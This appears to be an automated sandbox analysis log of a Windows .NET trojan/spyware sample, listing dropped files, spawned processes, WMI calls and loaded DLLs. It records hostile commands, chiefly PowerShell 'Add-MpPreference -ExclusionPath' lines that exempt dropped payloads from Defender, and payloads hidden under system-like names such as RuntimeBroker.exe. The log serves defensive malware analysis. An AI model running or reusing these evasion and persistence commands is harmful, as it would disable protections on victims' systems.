Source: W4tW72sfAD.exe, EwV3ECxYhIse1SOarW.cs Cryptographic APIs: 'CreateDecryptor'
Source: W4tW72sfAD.exe, EwV3ECxYhIse1SOarW.cs Cryptographic APIs: 'CreateDecryptor'
Source: W4tW72sfAD.exe, EwV3ECxYhIse1SOarW.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@45/93@4/5
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\cnkBPSdA.log
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_03
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Mutant created: NULL
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\e185fbb618a233f9f6c1861641b571576fcfea1e7ff2912d0387b1f1e908cb75
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7564:120:WilError_03
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\AppData\Local\Temp\eqmixkc3
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9x00cPKFqM.bat"
Source: W4tW72sfAD.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: W4tW72sfAD.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: W4tW72sfAD.exe ReversingLabs: Detection: 68%
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File read: C:\Users\user\Desktop\W4tW72sfAD.exe
Source: unknown Process created: C:\Users\user\Desktop\W4tW72sfAD.exe "C:\Users\user\Desktop\W4tW72sfAD.exe"
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCC57.tmp" "c:\Windows\System32\CSCC6B1193CD9FE40B5844F837FF967B9E7.TMP"
Source: unknown Process created: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Source: unknown Process created: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Source: unknown Process created: C:\Users\Public\Downloads\RuntimeBroker.exe C:\Users\Public\Downloads\RuntimeBroker.exe
Source: unknown Process created: C:\Users\Public\Downloads\RuntimeBroker.exe C:\Users\Public\Downloads\RuntimeBroker.exe
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\RuntimeBroker.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\internet explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9x00cPKFqM.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe "C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe "C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
Source: unknown Process created: C:\Users\Public\Downloads\RuntimeBroker.exe "C:\Users\Public\Downloads\RuntimeBroker.exe"
Source: unknown Process created: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe "C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown Process created: C:\Users\Public\Downloads\RuntimeBroker.exe "C:\Users\Public\Downloads\RuntimeBroker.exe"
Source: unknown Process created: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe "C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
Source: unknown Process created: C:\Users\Public\Downloads\RuntimeBroker.exe "C:\Users\Public\Downloads\RuntimeBroker.exe"
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline"
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\RuntimeBroker.exe'
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\internet explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9x00cPKFqM.bat"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCC57.tmp" "c:\Windows\System32\CSCC6B1193CD9FE40B5844F837FF967B9E7.TMP"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe "C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: ktmw32.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: rasman.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: dlnashext.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: wpdshext.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: mscoree.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: apphelp.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: kernel.appcore.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: version.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: windows.storage.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: wldp.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: version.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
